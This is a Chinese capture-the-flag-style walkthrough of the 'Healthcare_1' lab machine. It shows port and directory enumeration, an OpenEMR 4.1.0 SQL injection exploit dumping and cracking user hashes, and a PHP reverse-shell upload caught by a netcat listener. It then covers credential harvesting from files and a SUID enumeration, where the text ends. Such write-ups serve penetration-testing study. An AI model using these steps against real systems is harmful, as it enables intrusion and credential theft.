Healthcare_1 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-09 18:30 EDT
Nmap scan report for 192.1.1.141
Host is up (0.000064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 00:0C:29:95:F1:6A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds

只开放了 21 和 80 端口，看看 UDP 扫描的结果

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.141   
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-10 13:23 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00022s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   open|filtered ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:95:F1:6A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.16 seconds

盯着 21 和 80 端口

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap -sT -sV -sC -O -p21,80 192.1.1.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-09 18:31 EDT
Nmap scan report for 192.1.1.141
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
|_http-title: Coming Soon 2
| http-robots.txt: 8 disallowed entries 
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ 
|_/all_our_e-mail_addresses /admin/ /
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
MAC Address: 00:0C:29:95:F1:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.38
OS details: Linux 2.6.38
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds

有 robots.txt 文件，

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nmap --script=vuln -p21,80 192.1.1.141 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-09 18:32 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|   Hosts that seem down (vulnerable):
|_    224.0.0.251
Nmap scan report for 192.1.1.141
Host is up (0.00018s latency).

PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  BID:49303  CVE:CVE-2011-3192
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://www.tenable.com/plugins/nessus/55976
|       https://www.securityfocus.com/bid/49303
|_      https://seclists.org/fulldisclosure/2011/Aug/175
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-fileupload-exploiter: 
|   
|     Couldn\'t find a file-type field.
|   
|     Couldn\'t find a file-type field.
|   
|_    Couldn\'t find a file-type field.
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:95:F1:6A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 354.24 seconds

没什么收获，看看 Web 界面的 robots.txt 和 21 ftp 吧

Web 渗透

ftp 拿到了版本信息 ProFTPD 1.3.3d，尝试搜索该版本的漏洞，无收获。尝试匿名登录，失败。尝试查看 Web 服务

# $Id: robots.txt 410967 2009-08-06 19:44:54Z oden $
# $HeadURL: svn+ssh://svn.mandriva.com/svn/packages/cooker/apache-conf/current/SOURCES/robots.txt $
# exclude help system from robots
User-agent: *
Disallow: /manual/
Disallow: /manual-2.2/
Disallow: /addon-modules/
Disallow: /doc/
Disallow: /images/
# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...
Disallow: /all_our_e-mail_addresses
# same idea here...
Disallow: /admin/
# but allow htdig to index our doc-tree
#User-agent: htdig
#Disallow:
# disallow stress test
user-agent: stress-agent
Disallow: /

根据 robots.txt 中的注释，似乎使用 User-agent: htdig 的话似乎可以查看索引，并且 /all_our_e-mail_addresses 和 /admin/ 是针对爬虫机器人的陷阱

按理说 robots.txt 是君子协定，不知道访问上述目录是否需要特别设置 User-agent ，都尝试一遍得了

目录爆破

目录爆破也同时进行

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo dirsearch -u http://192.1.1.141      
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.141/_23-08-09_18-40-10.txt

Error Log: /root/.dirsearch/logs/errors-23-08-09_18-40-10.log

Target: http://192.1.1.141/

[18:40:10] Starting: 
[18:40:10] 301 -  334B  - /js  ->  http://192.1.1.141/js/                  
[18:40:11] 403 -  997B  - /.cgi                                            
[18:40:12] 403 -  997B  - /.ht_wsr.txt                                     
[18:40:12] 403 -  997B  - /.htaccess.orig
[18:40:12] 403 -  997B  - /.htaccess.save
[18:40:12] 403 -  997B  - /.htaccess.sample
[18:40:12] 403 -  997B  - /.htaccess.bak1
[18:40:12] 403 -  997B  - /.htaccessOLD
[18:40:12] 403 -  997B  - /.htaccessOLD2
[18:40:12] 403 -  997B  - /.htaccess_orig
[18:40:12] 403 -  997B  - /.htaccessBAK
[18:40:12] 403 -  997B  - /.htaccess_sc
[18:40:12] 403 -  997B  - /.htaccess_extra                                 
[18:40:12] 403 -  997B  - /.html
[18:40:12] 403 -  997B  - /.htm
[18:40:12] 403 -  997B  - /.httr-oauth                                     
[18:40:12] 403 -  997B  - /.htpasswd_test
[18:40:12] 403 -  997B  - /.htpasswds                                      
[18:40:14] 403 -  997B  - /AT-admin.cgi                                     
[18:40:16] 403 -  997B  - /WebShell.cgi                                     
[18:40:17] 403 -  997B  - /accounts.cgi                                     
[18:40:17] 403 -  997B  - /adm.cgi                                          
[18:40:17] 403 -  997B  - /admin.cgi                                        
[18:40:22] 403 -  997B  - /apply.cgi                                        
[18:40:22] 403 -  997B  - /auth.cgi                                         
[18:40:23] 403 -  997B  - /cachemgr.cgi                                     
[18:40:23] 403 - 1011B  - /cgi-bin/                                         
[18:40:24] 200 -    1KB - /cgi-bin/test.cgi                                 
[18:40:25] 301 -  335B  - /css  ->  http://192.1.1.141/css/                 
[18:40:26] 403 -  997B  - /dcadmin.cgi                                      
[18:40:27] 403 - 1011B  - /error/                                           
[18:40:27] 200 -    1KB - /favicon.ico                                      
[18:40:28] 301 -  337B  - /fonts  ->  http://192.1.1.141/fonts/             
[18:40:28] 403 -  997B  - /hndUnblock.cgi                                   
[18:40:29] 301 -  338B  - /images  ->  http://192.1.1.141/images/           
[18:40:29] 403 - 1011B  - /images/                                          
[18:40:29] 200 -    5KB - /index.html                                       
[18:40:29] 200 -    5KB - /index                                            
[18:40:30] 403 - 1011B  - /js/                                              
[18:40:31] 403 -  997B  - /login.cgi                                        
[18:40:32] 403 -  997B  - /members.cgi                                      
[18:40:33] 403 -  997B  - /mt-check.cgi                                     
[18:40:34] 403 -  997B  - /out.cgi                                          
[18:40:34] 403 -  997B  - /perlcmd.cgi                                      
[18:40:35] 403 -   59B  - /phpMyAdmin                                       
[18:40:36] 403 -   59B  - /phpMyAdmin/                                      
[18:40:36] 403 -   59B  - /phpMyAdmin/index.php                             
[18:40:36] 403 -   59B  - /phpMyAdmin/scripts/setup.php                     
[18:40:36] 403 -   59B  - /phpMyAdmin/phpMyAdmin/index.php
[18:40:37] 403 -  997B  - /ps_admin.cgi                                     
[18:40:37] 200 -  620B  - /robots.txt                                       
[18:40:38] 403 - 1011B  - /server-status/                                   
[18:40:38] 403 -  997B  - /server-status                                    
[18:40:38] 403 -  997B  - /server-info                                      
[18:40:39] 403 -  997B  - /signin.cgi                                       
[18:40:43] 403 - 1011B  - /vendor/

真正有用的目录 /cgi-bin/test.cgi，尝试爆破一下 /cgi-bin 目录

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo dirsearch -u http://192.1.1.141/cgi-bin/ -e cgi,sh

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: cgi, sh | HTTP method: GET | Threads: 30 | Wordlist size: 9515

Output File: /root/.dirsearch/reports/192.1.1.141/-cgi-bin-_23-08-10_11-15-35.txt

Error Log: /root/.dirsearch/logs/errors-23-08-10_11-15-35.log

Target: http://192.1.1.141/cgi-bin/

[11:15:35] Starting: 
[11:15:36] 403 -  997B  - /cgi-bin/.ht_wsr.txt                             
[11:15:36] 403 -  997B  - /cgi-bin/.htaccess.sample
[11:15:36] 403 -  997B  - /cgi-bin/.htaccess.bak1
[11:15:36] 403 -  997B  - /cgi-bin/.htaccess_extra
[11:15:36] 403 -  997B  - /cgi-bin/.htaccess.orig
[11:15:36] 403 -  997B  - /cgi-bin/.htaccessOLD2
[11:15:36] 403 -  997B  - /cgi-bin/.htaccess_orig
[11:15:36] 403 -  997B  - /cgi-bin/.htaccess.save
[11:15:36] 403 -  997B  - /cgi-bin/.htaccessBAK
[11:15:36] 403 -  997B  - /cgi-bin/.htaccess_sc
[11:15:36] 403 -  997B  - /cgi-bin/.htaccessOLD
[11:15:36] 403 -  997B  - /cgi-bin/.html                                   
[11:15:36] 403 -  997B  - /cgi-bin/.htpasswds
[11:15:36] 403 -  997B  - /cgi-bin/.httr-oauth
[11:15:36] 403 -  997B  - /cgi-bin/.htpasswd_test
[11:15:36] 403 -  997B  - /cgi-bin/.htm
[11:16:03] 200 -    1KB - /cgi-bin/test.cgi                                 
                                                                             
Task Completed

除了 test.cgi 之外没有别的可访问文件了，加一下 User-agent 再爆破一次

1	`sudo dirsearch -u http://192.1.1.141 --user-agent="User-agent: htdig"`

没别的结果了。而且 index 页面是 index.html

所以这个 User-agent 到底有什么用呢，将 htdig 当字典先存起来吧

网页很简单，倒计时是 script 触发的

小结一下，目前可以感知到的可能的攻击路径：robots.txt 中的目录（虽然都无法访问），test.cgi 文件，21 ftp 端口

尝试搜索 test cgi exploit ，有某些 bash 版本存在漏洞，但是尝试利用失败

尝试对 21 端口进行爆破，使用猜测的用户名 htdig, oden ，爆破失败

在这里卡了很久，没有思路，最后看 WP，发现是爆破字典的问题……

这里也是给自己一个提醒了，目录字典的问题一直没有考虑过，无脑使用 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt。不过为什么 kali 中默认只有 2.3-medium 版本，而没有 big 版本

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.1.1.141 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.1.1.141
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/11 14:00:52 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 5031]
/images               (Status: 301) [Size: 338] [--> http://192.1.1.141/images/]
/css                  (Status: 301) [Size: 335] [--> http://192.1.1.141/css/]
/js                   (Status: 301) [Size: 334] [--> http://192.1.1.141/js/]
/vendor               (Status: 301) [Size: 338] [--> http://192.1.1.141/vendor/]
/favicon              (Status: 200) [Size: 1406]
/robots               (Status: 200) [Size: 620]
/fonts                (Status: 301) [Size: 337] [--> http://192.1.1.141/fonts/]
/gitweb               (Status: 301) [Size: 338] [--> http://192.1.1.141/gitweb/]
/phpMyAdmin           (Status: 403) [Size: 59]
/server-status        (Status: 403) [Size: 997]
/server-info          (Status: 403) [Size: 997]
/openemr              (Status: 301) [Size: 339] [--> http://192.1.1.141/openemr/]
Progress: 1272284 / 1273834 (99.88%)
===============================================================
2023/08/11 14:06:40 Finished
===============================================================

OpenEMR 4.1.0 SQL 注入漏洞

发现了一个隐藏的目录 /openemr，访问该页面

有两个思路，这里看到了版本信息，可以尝试搜索该版本是否存在漏洞，再一个漏洞利用不成功的话可以考虑爆破

先从简单的查漏洞开始：搜索 OpenEMR 4.1.0

发现存在 exp，那就查看并修改其中的 url，在本地运行

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ python 49742.py

   ____                   ________  _______     __ __   ___ ____
  / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \
 / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
/ /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ /
\____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/
    /_/
    ____  ___           __   _____ ____    __    _
   / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)
  / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /
 / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /
/_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/   exploit by @ikuamike

[+] Finding number of users...
[+] Found number of users: 2
[+] Extracting username and password hash...
admin:3863efef9ee2bfbc51ecdca359c6302bed1389e8
medical:ab24aed5a7c4ad45615cd7e0da816eea39e4895d

应该是自动盲注得到了用户名和密码，不过这个密码看起来有点像 hash，尝试在线工具碰撞一下

拿到了两个用户名密码对，admin:ackbar, medical:medical

尝试在网站和 ftp 中分别登录

后台上传文件 getshell

网站中 admin 登录成功，ftp 中 medical 登录成功

网站中寻寻觅觅，找到了文件上传的入口（先在 ftp 中查看了网站目录结构，由于权限问题，ftp 中无法上传文件到网站目录）

直接上传一个经典 php 马，然后根据路径去访问http://192.1.1.141/openemr/sites/default/images/php-reverse-shell.php，来 getshell

成功

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ sudo nc -lvnp 443                       
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.141] 60168
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux
 15:51:06 up 21:22,  0 users,  load average: 1.00, 1.06, 1.07
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=479(apache) gid=416(apache) groups=416(apache)
sh: no job control in this shell
sh-4.1$ whoami
whoami
apache
sh-4.1$ id
id
uid=479(apache) gid=416(apache) groups=416(apache)
sh-4.1$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:95:f1:6a brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.141/24 brd 192.1.1.255 scope global eth1
    inet6 fe80::20c:29ff:fe95:f16a/64 scope link 
       valid_lft forever preferred_lft forever
ip a
sh-4.1$ uname -a
uname -a
Linux localhost.localdomain 2.6.38.8-pclos3.bfs #1 SMP PREEMPT Fri Jul 8 18:01:30 CDT 2011 i686 i686 i386 GNU/Linux

sh-4.1$ which python
which python
/usr/bin/python
sh-4.1$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"

ftp 中寻寻觅觅

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ ftp 192.1.1.141
Connected to 192.1.1.141.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.1.1.141]
Name (192.1.1.141:kali): medical
331 Password required for medical
Password: 
230 User medical logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Type set to I
ftp> ls
229 Entering Extended Passive Mode (|||48953|)
150 Opening ASCII mode data connection for file list
drwxr--r--   2 medical  medical      4096 Nov  5  2011 Desktop
drwx------   2 medical  medical      4096 Nov  5  2011 Documents
drwx------   2 medical  medical      4096 Oct 27  2011 Downloads
drwx------   2 medical  medical      4096 Jan 19  2010 Movies
drwx------   2 medical  medical      4096 Jan 19  2010 Music
drwx------   2 medical  medical      4096 Oct 27  2011 Pictures
drwxr-xr-x   2 medical  medical      4096 Jul 20  2011 Templates
drwxr-xr-x   2 medical  medical      4096 Jul 20  2011 Videos
drwx------   9 medical  medical      4096 Nov  5  2011 tmp
226 Transfer complete
ftp> cd Desktop
250 CWD command successful
ftp> ls -liah
229 Entering Extended Passive Mode (|||24046|)
150 Opening ASCII mode data connection for file list
drwxr--r--   2 medical  medical      4.0k Nov  5  2011 .
drwxr-xr-x  31 medical  medical      4.0k Nov  5  2011 ..
-rwxr-xr-x   1 medical  medical       265 Jul  3  2011 Get Libre Office.desktop
-rwxr-xr-x   1 medical  medical       229 Apr 12  2010 addlocale.desktop
-rwxr-xr-x   1 medical  medical       225 Apr 12  2010 drakfirewall.desktop
-rwxr-xr-x   1 medical  medical      1.2k Apr 12  2010 draknetcenter.desktop
226 Transfer complete
ftp> cd ..
250 CWD command successful

桌面上没东西，那就看看别的目录

ftp> ls -liah
229 Entering Extended Passive Mode (|||43237|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x  31 medical  medical      4.0k Nov  5  2011 .
drwxr-xr-x   5 root     root         4.0k Jul 29  2020 ..
-rw-------   1 medical  medical      5.9k Nov  5  2011 .ICEauthority
-rw-------   1 medical  medical       120 Nov  5  2011 .Xauthority
drwx------   3 medical  medical      4.0k Nov  5  2011 .adobe
-rw-r--r--   1 medical  medical       193 Sep 24  2011 .bash_profile
-rw-rw-r--   1 medical  medical       145 Sep  6  2011 .bashrc
drwxr-xr-x   3 medical  medical      4.0k Nov  5  2011 .cache
drwx------  11 medical  medical      4.0k Nov  5  2011 .config
drwx------   3 medical  medical      4.0k Oct 27  2011 .dbus
-rwxrwxr-x   1 root     root           14 Nov  5  2011 .desktop
-rw-------   1 medical  medical        28 Nov  5  2011 .dmrc
-rw-------   1 medical  medical        16 Oct 27  2011 .esd_auth
drwxr-xr-x   2 medical  medical      4.0k Nov  5  2011 .fontconfig
drwx------   4 medical  medical      4.0k Nov  5  2011 .gconf
drwx------   2 medical  medical      4.0k Nov  5  2011 .gconfd
-rw-r-----   1 medical  medical         0 Nov  5  2011 .gksu.lock
drwx------   9 medical  medical      4.0k Nov  5  2011 .gnome2
drwx------   2 medical  medical      4.0k Jul 20  2011 .gnome2_private
drwx------   3 medical  medical      4.0k Oct 27  2011 .gnupg
-rw-rw-r--   1 medical  medical       326 Nov  5  2011 .gtk-bookmarks
drwxrwxr-x   2 medical  medical      4.0k Oct 27  2011 .icons
drwxr-xr-x   3 medical  medical      4.0k Jul 20  2011 .local
drwx------   3 medical  medical      4.0k Oct 27  2011 .macromedia
-rw-r--r--   1 medical  medical         0 Oct 23  2010 .mdk-menu-migrated
-rw-rw-r--   1 medical  medical         0 Nov  5  2011 .menu-updates.stamp
drwx------   4 medical  medical      4.0k Oct 27  2011 .mozilla
drwx------   3 medical  medical      4.0k Oct 27  2011 .mysqlgui
drwxr-xr-x   2 medical  medical      4.0k Oct 23  2010 .nautilus
drwx------   3 medical  medical      4.0k Nov  5  2011 .pki
drwx------   2 medical  medical      4.0k Oct 27  2011 .pulse
-rw-------   1 medical  medical       256 Oct 27  2011 .pulse-cookie
drwxrwxr-x   2 medical  medical      4.0k Jul 20  2011 .themes
drwx------   3 medical  medical      4.0k Jul 20  2011 .thumbnails
-rw-r--r--   1 medical  medical      1.9k Jul  6  2011 .xbindkeysrc
drwxr--r--   2 medical  medical      4.0k Nov  5  2011 Desktop
drwx------   2 medical  medical      4.0k Nov  5  2011 Documents
drwx------   2 medical  medical      4.0k Oct 27  2011 Downloads
drwx------   2 medical  medical      4.0k Jan 19  2010 Movies
drwx------   2 medical  medical      4.0k Jan 19  2010 Music
drwx------   2 medical  medical      4.0k Oct 27  2011 Pictures
drwxr-xr-x   2 medical  medical      4.0k Jul 20  2011 Templates
drwxr-xr-x   2 medical  medical      4.0k Jul 20  2011 Videos
drwx------   9 medical  medical      4.0k Nov  5  2011 tmp
226 Transfer complete
ftp> cd Documents
250 CWD command successful
ftp> ls -alih
229 Entering Extended Passive Mode (|||35557|)
150 Opening ASCII mode data connection for file list
drwx------   2 medical  medical      4.0k Nov  5  2011 .
drwxr-xr-x  31 medical  medical      4.0k Nov  5  2011 ..
-rwxr-xr-x   1 medical  medical     33.8k Nov  4  2011 OpenEMR Passwords.pdf
-rw-rw-r--   1 medical  medical        82 Oct 27  2011 Passwords.txt

发现了 Passwords.txt

┌──(kali㉿kali)-[~/Downloads/Healthcare]
└─$ cat Passwords.txt       
PCLINUXOS MEDICAL
root-root
medical-medical


OPENEMR
admin-admin
medical-medical

得到了三对密码对，既然已经 getshell 了那就直接尝试上述密码对，还根据 /etc/passwd 文件来缩小用户范围（也就是排除掉admin）

bash-4.1$ su medical
su medical
Password: medical

[medical@localhost /]$ whoami
whoami
medical
[medical@localhost /]$ su -
su -
Password: root

su: incorrect password
[medical@localhost /]$ su root
su root
Password: root

su: incorrect password
[medical@localhost /]$ sudo -l
sudo -l
bash: sudo: command not found
[medical@localhost /]$ whoami
whoami
medical
[medical@localhost /]$ id
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)
[medical@localhost /]$ ls -liah /etc/passwd
ls -liah /etc/passwd
134072 -rw-r--r-- 1 root root 2.0K Jul 29  2020 /etc/passwd
[medical@localhost /]$ ls -liah /etc/shadow
ls -liah /etc/shadow
131337 -r--r----- 1 root shadow 1.1K Jul 29  2020 /etc/shadow

虽然 root 并不是 root 用户的密码，但是我们还是登录到了 medical 用户

查看家目录

[medical@localhost ~]$ ls -liah
ls -liah
total 168K
267486 drwxr-xr-x 31 medical medical 4.0K Nov  5  2011 ./
262657 drwxr-xr-x  5 root    root    4.0K Jul 29  2020 ../
267487 -rw-------  1 medical medical 5.9K Nov  5  2011 .ICEauthority
267488 -rw-------  1 medical medical  120 Nov  5  2011 .Xauthority
267489 drwx------  3 medical medical 4.0K Nov  4  2011 .adobe/
267493 -rw-r--r--  1 medical medical  193 Sep 24  2011 .bash_profile
267494 -rw-rw-r--  1 medical medical  145 Sep  6  2011 .bashrc
267495 drwxr-xr-x  3 medical medical 4.0K Nov  5  2011 .cache/
267515 drwx------ 11 medical medical 4.0K Nov  5  2011 .config/
414952 drwx------  3 medical medical 4.0K Oct 27  2011 .dbus/
267552 -rwxrwxr-x  1 root    root      14 Nov  4  2011 .desktop*
267553 -rw-------  1 medical medical   28 Nov  5  2011 .dmrc
267554 -rw-------  1 medical medical   16 Oct 27  2011 .esd_auth
414955 drwxr-xr-x  2 medical medical 4.0K Nov  4  2011 .fontconfig/
414961 drwx------  4 medical medical 4.0K Nov  5  2011 .gconf/
415106 drwx------  2 medical medical 4.0K Nov  5  2011 .gconfd/
267555 -rw-r-----  1 medical medical    0 Nov  5  2011 .gksu.lock
267556 drwx------  9 medical medical 4.0K Nov  4  2011 .gnome2/
267574 drwx------  2 medical medical 4.0K Jul 19  2011 .gnome2_private/
267575 drwx------  3 medical medical 4.0K Oct 27  2011 .gnupg/
267578 -rw-rw-r--  1 medical medical  326 Nov  5  2011 .gtk-bookmarks
267579 drwxrwxr-x  2 medical medical 4.0K Oct 27  2011 .icons/
267580 drwxr-xr-x  3 medical medical 4.0K Jul 19  2011 .local/
415110 drwx------  3 medical medical 4.0K Oct 27  2011 .macromedia/
267603 -rw-r--r--  1 medical medical    0 Oct 22  2010 .mdk-menu-migrated
267604 -rw-rw-r--  1 medical medical    0 Nov  5  2011 .menu-updates.stamp
415118 drwx------  4 medical medical 4.0K Oct 27  2011 .mozilla/
415194 drwx------  3 medical medical 4.0K Oct 27  2011 .mysqlgui/
415199 drwxr-xr-x  2 medical medical 4.0K Oct 22  2010 .nautilus/
415200 drwx------  3 medical medical 4.0K Nov  5  2011 .pki/
415205 drwx------  2 medical medical 4.0K Oct 27  2011 .pulse/
267605 -rw-------  1 medical medical  256 Oct 27  2011 .pulse-cookie
267606 drwxrwxr-x  2 medical medical 4.0K Jul 19  2011 .themes/
267607 drwx------  3 medical medical 4.0K Jul 19  2011 .thumbnails/
267622 -rw-r--r--  1 medical medical 1.9K Jul  6  2011 .xbindkeysrc
267623 drwxr--r--  2 medical medical 4.0K Nov  5  2011 Desktop/
267628 drwx------  2 medical medical 4.0K Nov  4  2011 Documents/
267631 drwx------  2 medical medical 4.0K Oct 27  2011 Downloads/
267633 drwx------  2 medical medical 4.0K Jan 19  2010 Movies/
267634 drwx------  2 medical medical 4.0K Jan 19  2010 Music/
267635 drwx------  2 medical medical 4.0K Oct 27  2011 Pictures/
267637 drwxr-xr-x  2 medical medical 4.0K Jul 19  2011 Templates/
267638 drwxr-xr-x  2 medical medical 4.0K Jul 19  2011 Videos/
267639 drwx------  9 medical medical 4.0K Nov  5  2011 tmp/

和 ftp 中看到的一致，在网站目录中找找数据库配置文件，然后用数据库密码尝试碰撞 root 密码

[medical@localhost default]$ ls
ls
LBF/              edi/          images/                 statement.inc.php
clickoptions.txt  era/          letter_templates/
config.php        faxcover.txt  referral_template.html
documents/        faxtitle.eps  sqlconf.php
[medical@localhost default]$ cat sqlconf.php
cat sqlconf.php
<?php
//  OpenEMR
//  MySQL Config

$host   = 'localhost';
$port   = '3306';
$login  = 'openemr';
$pass   = 'openemr';
$dbase  = 'openemr';

//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;

$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>
[medical@localhost default]$ su -
su -
Password: openemr

su: incorrect password

环境变量提权

失败，尝试看看 SUID 文件

[medical@localhost default]$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
147863   12 -rwsr-xr-x   1 root     root         9564 Sep  3  2011 /usr/libexec/pt_chown
147695  236 -rws--x--x   1 root     root       238352 Sep  8  2011 /usr/lib/ssh/ssh-keysign
145819    8 -rwsr-xr-x   1 root     polkituser     5748 Apr  5  2010 /usr/lib/polkit-resolve-exe-helper
145811   12 -rwsr-xr-x   1 root     root         9108 Aug 29  2011 /usr/lib/polkit-1/polkit-agent-helper-1
139126   12 -rwsr-xr-x   1 root     root         9940 Nov  2  2011 /usr/lib/chromium-browser/chrome-sandbox
145817    8 -rwsr-xr--   1 root     polkituser     7580 Apr  5  2010 /usr/lib/polkit-grant-helper-pam
145821   16 -rwsr-xr-x   1 polkituser root        16356 Apr  5  2010 /usr/lib/polkit-set-default-helper
147975   12 -rwsr-xr-x   1 root     root        10757 Jun 11  2011 /usr/sbin/fileshareset
148146   12 -rwsr-xr-x   1 root     root        12036 Nov 28  2010 /usr/sbin/traceroute6
148168   12 -rwsr-xr-x   1 root     root        10713 Aug  2  2011 /usr/sbin/usernetctl
148166   36 -rwsr-xr-x   1 root     root        33324 Nov  9  2009 /usr/sbin/userhelper
136381   40 -rwsr-sr-x   1 root     root        39020 Jun 26  2011 /usr/bin/crontab
136286   44 -rwsr-sr-x   1 daemon   daemon      41036 Jan 19  2010 /usr/bin/at
137295   32 -rwsr-xr-x   1 root     root        28916 Dec 28  2010 /usr/bin/pumount
136305    4 -rwsr-sr-x   1 daemon   daemon        137 Jan 19  2010 /usr/bin/batch
136529   16 -rwsr-xr-x   1 root     root        15848 Jan  9  2010 /usr/bin/expiry
137125   32 -rws--x--x   1 root     root        28752 Jan  9  2010 /usr/bin/newgrp
137230   20 -rwsr-xr-x   1 root     root        16920 Aug 29  2011 /usr/bin/pkexec
